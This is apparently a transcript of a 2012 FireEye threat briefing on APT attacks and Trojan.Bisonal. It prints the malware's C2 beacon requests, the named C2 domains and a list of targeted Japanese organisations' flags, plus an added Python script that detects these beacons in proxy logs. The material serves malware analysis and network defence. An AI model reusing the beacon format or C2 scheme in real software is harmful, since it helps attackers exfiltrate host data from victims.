Copyright (c) 2011, FireEye, Inc. All rights reserved. | CONFIDENTIAL 1 Stopping Next-Gen Threats...

Post on 29-Mar-2015


Stopping Next-Gen Threats

Dan Walters – Sr. Systems Engineer Mgr.


"We're moving towards a world where every attack is effectively zero-day… having a signatured piece of malware, that shouldn't be the foundation on which any security model works." - Chris Young, GVP Cisco Security

Tech Week Europe, September 28th 2012


High Profile APT Attacks Are Increasingly Common


The Attack Lifecycle – Multiple Stages

1. Exploitation of system
2. Malware binary download
3. Callbacks and control established

[Diagram: compromised Web server or Web 2.0 site; callback server; IPS; DMZ; File Share 1; File Share 2]

Crimeware == for the $


Advanced Persistent Threat == Human


This is Alex == FireEye Research


The Usual Suspects


Organized…Persistent…


Reconnaissance made easy…


The Exploit


LaserMotive


CEOs are targeted


Could you stop this?


The Callback


Hidden in plain view…


Blog Post?


RSS Feed?


We’re Only Human


HR make for easy targets


Just doing my job…


NATO is a frequent spearphish target


Global Unrest


Whose Oil is it?


The curious case of Trojan.Bisonal

• Targets 100% Japanese organizations

• Delivered via weaponized doc/xls files

• Embeds the target name into the command and control traffic


Custom “Flag” and C2 domain

Beacon request (the flag and victim host details are carried in the User-Agent header):

GET /j/news.asp?id=* HTTP/1.1
User-Agent: flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: proxy:
Host: online.cleansite.us
Cache-Control: no-cache

Second request (the same flag reappears as the C2 subdomain):

GET /a.asp?id=* HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: khi.acmetoy.com
Connection: Keep-Alive


Other “Flag”s seen

• flag:410maff <-- ministry of agriculture, forestry, and fisheries
• flag:1223
• Flag:712mhi <-- mitsubishi heavy industries
• Flag:727x
• Flag:8080
• Flag:84d
• flag:boat
• Flag:d2
• Flag:dick
• flag:jsexe
• flag:jyt
• Flag:m615
• flag:toray
• Flag:MARK 1
• flag:nec01 <-- nec corporation
• Flag:qqq
• flag:nids <-- national institute for defense studies (nids.go.jp)
• flag:nsc516 <-- nippon steel corp
• flag:ihi <-- ihi corp
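The two slides above give a defender two handles on this traffic: the beacon User-Agent is a space-separated list of key:value pairs starting with flag:, and the flag reappears as the first DNS label of the C2 host (khi in khi.acmetoy.com). The following Python is an added example, not FireEye's code, that parses a constructed proxy log in a made-up four-field format (timestamp, client IP, method, URL, quoted User-Agent), extracts the flag from any Bisonal-style User-Agent, labels it with the organizations named on the slide, and then correlates later requests from the same client to a host whose first label equals that flag. The IP addresses and the example.com entry are constructed; treating "flag equals C2 subdomain" as a general rule is an assumption drawn from the single pair of requests on the slide.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Flag-to-organization mapping taken from the slide (khi and the others are unmapped there).
KNOWN_FLAGS = {
    "410maff": "Ministry of Agriculture, Forestry and Fisheries",
    "712mhi": "Mitsubishi Heavy Industries",
    "nec01": "NEC Corporation",
    "nids": "National Institute for Defense Studies",
    "nsc516": "Nippon Steel Corp",
    "ihi": "IHI Corp",
}

# Constructed proxy log lines. The format and client IPs are made up for this
# example; the beacon User-Agent layout and the two domains come from the slide.
SAMPLE_PROXY_LOG = [
    '2012-09-28T09:01:11Z 10.0.0.43 GET http://online.cleansite.us/j/news.asp?id=1 '
    '"flag:khi host:Business IP:10.0.0.43 OS:XPSP3 vm: proxy:"',
    '2012-09-28T09:01:12Z 10.0.0.43 GET http://khi.acmetoy.com/a.asp?id=1 '
    '"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"',
    '2012-09-28T09:02:30Z 10.0.0.77 GET http://www.example.com/index.html '
    '"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36"',
    '2012-09-28T09:03:05Z 10.0.0.91 GET http://online.cleansite.us/j/news.asp?id=2 '
    '"Flag:nec01 host:WS-17 IP:10.0.0.91 OS:XPSP3 vm:1 proxy:"',
]

_LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)"$')
_PAIR_RE = re.compile(r"(?P<key>[A-Za-z]+):(?P<val>\S*)")
# Keys observed in the slide's beacon besides flag; vm: and proxy: may be empty.
_BEACON_KEYS = {"host", "ip", "os"}


def parse_bisonal_beacon(user_agent: str) -> Optional[Dict[str, str]]:
    """Return the key/value pairs of a Bisonal-style User-Agent, or None.

    Keys are lower-cased because the slide shows both 'flag:' and 'Flag:'.
    A match requires a non-empty flag plus at least two of host/IP/OS, so an
    ordinary browser User-Agent (no key:value pairs) is never matched.
    """
    pairs = {m.group("key").lower(): m.group("val") for m in _PAIR_RE.finditer(user_agent)}
    if not pairs.get("flag"):
        return None
    if len(_BEACON_KEYS & pairs.keys()) < 2:
        return None
    return pairs


def scan_proxy_log(lines: List[str]) -> List[dict]:
    """Two-pass scan over proxy log lines.

    Pass 1 records every beacon and the flags seen per client IP.
    Pass 2 reports non-beacon requests from the same client to a host whose
    first DNS label equals one of its flags (the khi.acmetoy.com pattern).
    """
    alerts: List[dict] = []
    flags_by_src: Dict[str, set] = {}
    parsed: List[dict] = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the constructed format
        rec = m.groupdict()
        parsed.append(rec)
        beacon = parse_bisonal_beacon(rec["ua"])
        if beacon:
            flag = beacon["flag"].lower()
            flags_by_src.setdefault(rec["src"], set()).add(flag)
            alerts.append({
                "ts": rec["ts"], "src": rec["src"], "kind": "beacon", "flag": flag,
                "org": KNOWN_FLAGS.get(flag), "host": urlparse(rec["url"]).hostname,
            })
    for rec in parsed:
        host = urlparse(rec["url"]).hostname or ""
        label = host.split(".")[0].lower()
        if label in flags_by_src.get(rec["src"], set()) and parse_bisonal_beacon(rec["ua"]) is None:
            alerts.append({
                "ts": rec["ts"], "src": rec["src"], "kind": "flag-domain", "flag": label,
                "org": KNOWN_FLAGS.get(label), "host": host,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(alert)
```

On the constructed log this yields three alerts: two beacons (khi from 10.0.0.43, nec01 from 10.0.0.91, the latter labelled NEC Corporation) and one flag-domain hit for the follow-up request to khi.acmetoy.com from 10.0.0.43. The second pass is what catches the request whose User-Agent looks like a normal MSIE browser; on its own that request is indistinguishable from legitimate traffic.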


China is not the only threat


Multi-Protocol, Real-Time VX Engine

PHASE 1: Multi-Protocol Object Capture

PHASE 1: WEB MPS
• Aggressive Capture
• Web Object Filter

PHASE 1: E-MAIL MPS
• Email Attachments
• URL Analysis

PHASE 2: Virtual Execution Environments (mapped to target OS and applications)

DYNAMIC, REAL-TIME ANALYSIS
• Exploit detection
• Malware binary analysis
• Cross-matrix of OS/apps
• Originating URL
• Subsequent URLs
• OS modification report
• C&C protocol descriptors

Thank You!

FireEye - Modern Malware Protection System